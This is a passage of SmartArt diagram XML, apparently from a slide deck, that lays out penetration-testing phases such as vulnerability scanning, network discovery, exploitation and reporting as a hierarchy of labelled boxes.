        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D730AB31-4DBE-470B-AE26-7212205AC4ED}" type="parTrans" cxnId="{AF9878F8-2E20-4AE8-8326-28FC56911165}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F3D6A06F-9188-42EA-A825-328956D535F3}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" i="0" dirty="0"/>
            <a:t>Vulnerability Scanning</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A2AA2A79-D1EE-4D16-A8EA-7B267FE49388}" type="sibTrans" cxnId="{281E1325-F7C1-4643-8D22-194BF8BFD75F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{82E8AEE0-1082-4585-B796-031C06E6EB97}" type="parTrans" cxnId="{281E1325-F7C1-4643-8D22-194BF8BFD75F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3157412E-37A6-4C0D-B276-C15BB679E2B3}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" i="0" dirty="0"/>
            <a:t>Network Discovery</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{04049D0D-7E13-43C7-9174-745D22899B46}" type="sibTrans" cxnId="{767456E8-6A07-41C8-9525-81CAE9025D88}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7DF78917-8119-48B3-8FD1-6B5085F1A8F2}" type="parTrans" cxnId="{767456E8-6A07-41C8-9525-81CAE9025D88}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{60D9B8FA-8FB9-447C-9715-6B8C7577E4CB}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p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Manual Penetration</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{409FEFB5-C98F-4BCC-A2B9-365E801E456D}" type="sibTrans" cxnId="{5689F757-48EF-4FA0-995A-74C46C4DA28E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0F0C1EA1-1274-4AB8-BE99-96EA255FFCAC}" type="parTrans" cxnId="{5689F757-48EF-4FA0-995A-74C46C4DA28E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{538D6246-0E2A-46BF-97B7-5313894F212A}">
      <dgm:prSet phldrT="[Text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Exploitation of Vulnerabilities</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{69EF1869-F427-4F85-B6E5-166B52FB069E}" type="sibTrans" cxnId="{059459D2-B47F-49CA-9D25-6E6256D3E961}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E404FB07-A4BE-4F6A-B012-DA87857FFB5E}" type="parTrans" cxnId="{059459D2-B47F-49CA-9D25-6E6256D3E961}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{86507684-17DA-41D3-BA7A-1503089733F7}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" i="0" dirty="0"/>
            <a:t>Post-Penetration Phase</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C68424F9-D641-4D5B-8F66-336BBCE6823C}" type="sibTrans" cxnId="{B7E2A0DB-25BD-42BF-8C5D-D2F132D423FB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A4B815E8-557F-4768-9A61-857ED0BD669A}" type="parTrans" cxnId="{B7E2A0DB-25BD-42BF-8C5D-D2F132D423FB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{152FC883-2286-4893-8EE9-7D4E73D7E39D}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" i="0" dirty="0"/>
            <a:t>Reporting Phase</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0A2C2BDA-9BF4-4CDA-BC59-E520DE6E1C90}" type="parTrans" cxnId="{D6FD3888-C852-4F4A-874B-BDBA77199F56}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D6B08325-96A3-4BD9-B917-CD7A43B69AB6}" type="sibTrans" cxnId="{D6FD3888-C852-4F4A-874B-BDBA77199F56}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{48B8CA99-4E36-4BD7-AFB7-24C543DFD490}" type="pres">
      <dgm:prSet presAssocID="{5EBFD2DD-12F1-43FE-972A-8F8AC55BEB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E38D7A-D4AC-4373-80B2-D306076AB239}" type="pres">
      <dgm:prSet presAssocID="{5EBFD2DD-12F1-43FE-972A-8F8AC55BEB41}" presName="hierFlow" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{92DCE4B8-DDE4-43DA-82A6-F5208D56CC16}" type="pres">
      <dgm:prSet presAssocID="{5EBFD2DD-12F1-43FE-972A-8F8AC55BEB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173B5A7-6BC3-4CA3-9C95-0FB1E5DB4C5E}" type="pres">
      <dgm:prSet presAssocID="{EA446CF9-05BD-4C54-AD18-AEE4A5D215DF}" presName="Name17" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7AFB0ECF-FBCA-4EF4-87DE-A26BCB5CA7EB}" type="pres">
      <dgm:prSet presAssocID="{EA446CF9-05BD-4C54-AD18-AEE4A5D215DF}" presName="level1Shape" presStyleLbl="node0" presStyleIdx="0" presStyleCnt="1" custScaleX="169930">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D5A1AC19-36E6-43DA-BAAD-025AD2526CE3}" type="pres">
      <dgm:prSet presAssocID="{EA446CF9-05BD-4C54-AD18-AEE4A5D215DF}" presName="hierChild2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{49EFDB88-B92A-43D4-9293-4D84ED0CD031}" type="pres">
      <dgm:prSet presAssocID="{890A6ABB-3E2D-4334-9FC3-758713BD2CC3}" presName="Name25" presStyleLbl="parChTrans1D2" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{364E3821-782E-4EDD-9D57-708AF266A262}" type="pres">
      <dgm:prSet presAssocID="{890A6ABB-3E2D-4334-9FC3-758713BD2CC3}" presName="connTx" presStyleLbl="parChTrans1D2" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{633EC49F-FF2A-4F6D-8912-9C1B100E8C5E}" type="pres">
      <dgm:prSet presAssocID="{AA3D112B-D920-4ABB-A039-33BD00D46752}" presName="Name30" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5ED76F30-F21F-4936-9F25-37834B240C1A}" type="pres">
      <dgm:prSet presAssocID="{AA3D112B-D920-4ABB-A039-33BD00D46752}" presName="level2Shape" presStyleLbl="node2" presStyleIdx="0" presStyleCnt="5" custScaleX="184770"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FD6D6A0E-783C-4CB0-B485-DB4F3E780F07}" type="pres">
      <dgm:prSet presAssocID="{AA3D112B-D920-4ABB-A039-33BD00D46752}" presName="hierChild3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7C3D5C99-09E9-4F54-8006-E96AE45392DF}" type="pres">
      <dgm:prSet presAssocID="{597857DF-DC9C-48B5-B3CD-0A47E034B2EA}" presName="Name25" presStyleLbl="parChTrans1D3" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{927FE169-9205-461E-A39A-7399B608851C}" type="pres">
      <dgm:prSet presAssocID="{597857DF-DC9C-48B5-B3CD-0A47E034B2EA}" presName="connTx" presStyleLbl="parChTrans1D3" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{043A497A-CF01-46DC-B8E5-E1D66E294397}" type="pres">
      <dgm:prSet presAssocID="{859AE946-6B5B-4EB8-B617-A8B630C3A5B2}" presName="Name30" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B239EA25-B8DC-4F6A-AEFC-4D92389D701E}" type="pres">
      <dgm:prSet presAssocID="{859AE946-6B5B-4EB8-B617-A8B630C3A5B2}" presName="level2Shape" presStyleLbl="node3" presStyleIdx="0" presStyleCnt="5" custScaleX="169569"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7AD18404-2F82-48E8-AA6C-E436A827957D}" type="pres">
      <dgm:prSet presAssocID="{859AE946-6B5B-4EB8-B617-A8B630C3A5B2}" presName="hierChild3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{80723A8A-FDE8-4DFA-9211-8B8261EE5BED}" type="pres">
      <dgm:prSet presAssocID="{9512378D-1112-4C71-B9B9-DE3B9E169C80}" presName="Name25" presStyleLbl="parChTrans1D3" presStyleIdx="1" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1BD63162-516B-4854-A912-334818FC8BAB}" type="pres">
      <dgm:prSet presAssocID="{9512378D-1112-4C71-B9B9-DE3B9E169C80}" presName="connTx" presStyleLbl="parChTrans1D3" presStyleIdx="1" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AEFF88C3-29C2-4665-AA80-1852E1D721C9}" type="pres">
      <dgm:prSet presAssocID="{1CB356B6-ABF8-45F9-826D-64CF0AFB1D04}" presName="Name30" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FF64C604-8CEA-42BF-B3E9-C126DDA5C76D}" type="pres">
      <dgm:prSet presAssocID="{1CB356B6-ABF8-45F9-826D-64CF0AFB1D04}" presName="level2Shape" presStyleLbl="node3" presStyleIdx="1" presStyleCnt="5" custScaleX="169569"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A73E9691-4464-4F5D-A3EC-7D22CF2EAB8A}" type="pres">
      <dgm:prSet presAssocID="{1CB356B6-ABF8-45F9-826D-64CF0AFB1D04}" presName="hierChild3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0A46B755-C71F-46DF-A949-4D433FA951A0}" type="pres">
      <dgm:prSet presAssocID="{F5ED2C56-B2D3-44E1-9F40-8B0193984739}" presName="Name25" presStyleLbl="parChTrans1D4" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CDB56DFC-B1A1-405C-AFC0-4ED3F61E4811}" type="pres">
      <dgm:prSet presAssocID="{F5ED2C56-B2D3-44E1-9F40-8B0193984739}" presName="connTx" presStyleLbl="parChTrans1D4" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6454804C-68DC-40C4-8846-0127B6D185BC}" type="pres">
      <dgm:prSet presAssocID="{D2D6C4E9-93B0-4C94-B391-F3C0FA4F2163}" presName="Name30" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{98ADB92E-6B66-4ED8-A365-A518F50F0F67}" type="pres">
      <dgm:prSet presAssocID="{D2D6C4E9-93B0-4C94-B391-F3C0FA4F2163}" presName="level2Shape" presStyleLbl="node4" presStyleIdx="0" presStyleCnt="2" custScaleX="158471"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{63EC1BD5-7551-4525-B8BF-5CEFA2DA7C19}" type="pres">
      <dgm:prSet presAssocID="{D2D6C4E9-93B0-4C94-B391-F3C0FA4F2163}" presName="hierChild3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2670C067-CB35-41A7-B5CC-34873CF4B288}" type="pres">
      <dgm:prSet presAssocID="{9306B73A-6E29-478A-A9E5-B768742B3AEC}" presName="Name25" presStyleLbl="parChTrans1D4" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{780883CC-FD14-4FF4-8BB1-53AEF80A1169}" type="pres">
      <dgm:prSet presAssocID="{9306B73A-6E29-478A-A9E5-B768742B3AEC}" presName="connTx" presStyleLbl="parChTrans1D4" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3AF70139-B5C3-436A-9411-D24016DC26A6}" type="pres">
      <dgm:prSet presAssocID="{3DE43D11-D55A-4DED-B63B-67DA8447F4E6}" presName="Name30" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{14D5FDA6-D06E-407F-B589-A77E260919F8}" type="pres">
      <dgm:prSet presAssocID="{3DE43D11-D55A-4DED-B63B-67DA8447F4E6}" presName="level2Shape" presStyleLbl="node4" presStyleIdx="1" presStyleCnt="2" custScaleX="158471"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{406510EC-1AD6-4D72-9991-7C8975C43C99}" type="pres">
      <dgm:prSet presAssocID="{3DE43D11-D55A-4DED-B63B-67DA8447F4E6}" presName="hierChild3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1519E079-0809-44E5-AA2D-99EE7208A316}" type="pres">
      <dgm:prSet presAssocID="{D730AB31-4DBE-470B-AE26-7212205AC4ED}" presName="Name25" presStyleLbl="parChTrans1D2" presStyleIdx="1" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0A97A2BB-B8A3-43EE-B369-CE388CC3D781}" type="pres">
      <dgm:prSet presAssocID="{D730AB31-4DBE-470B-AE26-7212205AC4ED}" presName="connTx" presStyleLbl="parChTrans1D2" presStyleIdx="1" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B6EA1BB0-6A03-418F-A776-48D8E8AB7766}" type="pres">
      <dgm:prSet presAssocID="{60CF3575-3E4A-4BE3-97F9-AEC3574E32BD}" presName="Name30" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AE4C888D-7118-4BFB-999A-F7759DEE1984}" type="pres">
      <dgm:prSet presAssocID="{60CF3575-3E4A-4BE3-97F9-AEC3574E32BD}" presName="level2Shape" presStyleLbl="node2" presStyleIdx="1" presStyleCnt="5" custScaleX="184770"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8C9239A6-2434-4E59-9993-077D1A6A7472}" type="pres">
      <dgm:prSet presAssocID="{60CF3575-3E4A-4BE3-97F9-AEC3574E32BD}" presName="hierChild3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{67104284-3302-4E00-A8C5-789BCA8DAA53}" type="pres">
      <dgm:prSet presAssocID="{82E8AEE0-1082-4585-B796-031C06E6EB97}" presName="Name25" presStyleLbl="parChTrans1D3" presStyleIdx="2" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{63562B0F-934D-4062-A98C-487DD75950D4}" type="pres">
      <dgm:prSet presAssocID="{82E8AEE0-1082-4585-B796-031C06E6EB97}" presName="connTx" presStyleLbl="parChTrans1D3" presStyleIdx="2" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{43DFB733-EF16-4E14-983C-76161A50879B}" type="pres">
      <dgm:prSet presAssocID="{F3D6A06F-9188-42EA-A825-328956D535F3}" presName="Name30" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5905D779-965D-4068-986E-71426A75FD19}" type="pres">
      <dgm:prSet presAssocID="{F3D6A06F-9188-42EA-A825-328956D535F3}" presName="level2Shape" presStyleLbl="node3" presStyleIdx="2" presStyleCnt="5" custScaleX="169569"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7153CA41-EC5C-41EF-93EF-8DCB2A2235CF}" type="pres">
      <dgm:prSet presAssocID="{F3D6A06F-9188-42EA-A825-328956D535F3}" presName="hierChild3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A6A9C7FC-9147-4598-BC5E-FC20E01EE7E3}" type="pres">
      <dgm:prSet presAssocID="{7DF78917-8119-48B3-8FD1-6B5085F1A8F2}" presName="Name25" presStyleLbl="parChTrans1D3" presStyleIdx="3" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AFABE19C-6825-4B8D-A384-D73B2722D664}" type="pres">
      <dgm:prSet presAssocID="{7DF78917-8119-48B3-8FD1-6B5085F1A8F2}" presName="connTx" presStyleLbl="parChTrans1D3" presStyleIdx="3" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{684E81F1-C3C3-4EF8-B659-FD062FAA3E43}" type="pres">
      <dgm:prSet presAssocID="{3157412E-37A6-4C0D-B276-C15BB679E2B3}" presName="Name30" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{15486DDF-0DCA-40A0-B85F-71CA7A341155}" type="pres">
      <dgm:prSet presAssocID="{3157412E-37A6-4C0D-B276-C15BB679E2B3}" presName="level2Shape" presStyleLbl="node3" presStyleIdx="3" presStyleCnt="5" custScaleX="169569"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D7F08D71-4F57-4D2B-A0D2-2A9548F7CF9D}" type="pres">
      <dgm:prSet presAssocID="{3157412E-37A6-4C0D-B276-C15BB679E2B3}" presName="hierChild3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{83DC5FA6-66FB-44B9-A3EE-459B1AB79693}" type="pres">
      <dgm:prSet presAssocID="{0F0C1EA1-1274-4AB8-BE99-96EA255FFCAC}" presName="Name25" presStyleLbl="parChTrans1D3" presStyleIdx="4" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{700CB7B3-6759-4BBB-B78E-CD92122D0E89}" type="pres">
      <dgm:prSet presAssocID="{0F0C1EA1-1274-4AB8-BE99-96EA255FFCAC}" presName="connTx" presStyleLbl="parChTrans1D3" presStyleIdx="4" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{ADE22BB6-01C8-4A62-8C03-38F907F979DF}" type="pres">
      <dgm:prSet presAssocID="{60D9B8FA-8FB9-447C-9715-6B8C7577E4CB}" presName="Name30" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BB4CAAB3-0DDC-46FD-A230-5DD8AAD02D7F}" type="pres">
      <dgm:prSet presAssocID="{60D9B8FA-8FB9-447C-9715-6B8C7577E4CB}" presName="level2Shape" presStyleLbl="node3" presStyleIdx="4" presStyleCnt="5" custScaleX="169569"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FED8EDE0-489D-45D4-88B0-A217936E3C59}" type="pres">
      <dgm:prSet presAssocID="{60D9B8FA-8FB9-447C-9715-6B8C7577E4CB}" presName="hierChild3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{ED9D0F85-1789-462F-B716-4A32DDBF2842}" type="pres">
      <dgm:prSet presAssocID="{E404FB07-A4BE-4F6A-B012-DA87857FFB5E}" presName="Name25" presStyleLbl="parChTrans1D2" presStyleIdx="2" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D3E2F5C8-4798-4FCD-914E-E88186659B82}" type="pres">
      <dgm:prSet presAssocID="{E404FB07-A4BE-4F6A-B012-DA87857FFB5E}" presName="connTx" presStyleLbl="parChTrans1D2" presStyleIdx="2" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AA1E4EC5-CAC0-440D-AA1A-91B57C508027}" type="pres">
      <dgm:prSet presAssocID="{538D6246-0E2A-46BF-97B7-5313894F212A}" presName="Name30" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{18B0B436-DFF0-443A-B454-3951E93BFE65}" type="pres">
      <dgm:prSet presAssocID="{538D6246-0E2A-46BF-97B7-5313894F212A}" presName="level2Shape" presStyleLbl="node2" presStyleIdx="2" presStyleCnt="5" custScaleX="184770"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3968AFFE-32D8-4532-977E-7971C1B29B0F}" type="pres">
      <dgm:prSet presAssocID="{538D6246-0E2A-46BF-97B7-5313894F212A}" presName="hierChild3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{693A979C-DC12-44DF-A074-F07B6196A5E8}" type="pres">
      <dgm:prSet presAssocID="{A4B815E8-557F-4768-9A61-857ED0BD669A}" presName="Name25" presStyleLbl="parChTrans1D2" presStyleIdx="3" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EEA306E0-2133-40A0-ADC6-1A8582E7FAE0}" type="pres">
      <dgm:prSet presAssocID="{A4B815E8-557F-4768-9A61-857ED0BD669A}" presName="connTx" presStyleLbl="parChTrans1D2" presStyleIdx="3" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{927E8716-1FC0-422E-86AE-3DFFDBD087AF}" type="pres">
      <dgm:prSet presAssocID="{86507684-17DA-41D3-BA7A-1503089733F7}" presName="Name30" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9DD4ABD0-A59E-445F-B1BD-9A4AEB5A0C7D}" type="pres">
      <dgm:prSet presAssocID="{86507684-17DA-41D3-BA7A-1503089733F7}" presName="level2Shape" presStyleLbl="node2" presStyleIdx="3" presStyleCnt="5" custScaleX="184770"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D8019A2B-AB8E-49D6-960B-D065FAA1A324}" type="pres">
      <dgm:prSet presAssocID="{86507684-17DA-41D3-BA7A-1503089733F7}" presName="hierChild3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DF86A2E5-D657-4D9D-9FA0-8314F6C76A75}" type="pres">
      <dgm:prSet presAssocID="{0A2C2BDA-9BF4-4CDA-BC59-E520DE6E1C90}" presName="Name25" presStyleLbl="parChTrans1D2" presStyleIdx="4" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A1B36EAD-EF3D-43E1-9FED-0B990C3EC206}" type="pres">
      <dgm:prSet presAssocID="{0A2C2BDA-9BF4-4CDA-BC59-E520DE6E1C90}" presName="connTx" presStyleLbl="parChTrans1D2" presStyleIdx="4" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9904BBFB-1074-4078-AB36-3BDBB26EE583}" type="pres">
      <dgm:prSet presAssocID="{152FC883-2286-4893-8EE9-7D4E73D7E39D}" presName="Name30" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FA9C2F15-D8B0-49A6-99EF-36ED91016DED}" type="pres">
      <dgm:prSet presAssocID="{152FC883-2286-4893-8EE9-7D4E73D7E39D}" presName="level2Shape" presStyleLbl="node2" presStyleIdx="4" presStyleCnt="5" custScaleX="184770"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CED5A75D-B3C5-4781-80A0-2FCCF5B21479}" type="pres">
      <dgm:prSet presAssocID="{152FC883-2286-4893-8EE9-7D4E73D7E39D}" presName="hierChild3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D2707AC1-6976-408E-A55F-6C76BB7567F1}" type="pres">
      <dgm:prSet presAssocID="{5EBFD2DD-12F1-43FE-972A-8F8AC55BEB41}" presName="bgShapesFlow" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{B39E9C06-C517-42D7-BBC4-1442AE2B3AA1}" type="presOf" srcId="{597857DF-DC9C-48B5-B3CD-0A47E034B2EA}" destId="{927FE169-9205-461E-A39A-7399B608851C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy5"/>
    <dgm:cxn modelId="{79A20F08-6127-45BF-87CA-7B57E417AB58}" type="presOf" srcId="{9512378D-1112-4C71-B9B9-DE3B9E169C80}" destId="{80723A8A-FDE8-4DFA-9211-8B8261EE5BED}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy5"/>
    <dgm:cxn modelId="{1D1CB00D-259A-4700-844D-6D288F7B3AF0}" type="presOf" srcId="{60D9B8FA-8FB9-447C-9715-6B8C7577E4CB}" destId="{BB4CAAB3-0DDC-46FD-A230-5DD8AAD02D7F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy5"/>
    <dgm:cxn modelId="{11FECD11-7C65-4D32-A805-186EB6037F9B}" type="presOf" srcId="{538D6246-0E2A-46BF-97B7-5313894F212A}" destId="{18B0B436-DFF0-443A-B454-3951E93BFE65}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy5"/>
    <dgm:cxn modelId="{D247C51F-A1A1-460B-986B-18D86A208BCE}" type="presOf" srcId="{D730AB31-4DBE-470B-AE26-7212205AC4ED}" destId="{1519E079-0809-44E5-AA2D-99EE7208A316}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy5"/>
    <dgm:cxn modelId="{F6481C20-12F7-46E3-B863-24354B6EC45B}" type="presOf" srcId="{9512378D-1112-4C71-B9B9-DE3B9E169C80}" destId="{1BD63162-516B-4854-A912-334818FC8BAB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy5"/>
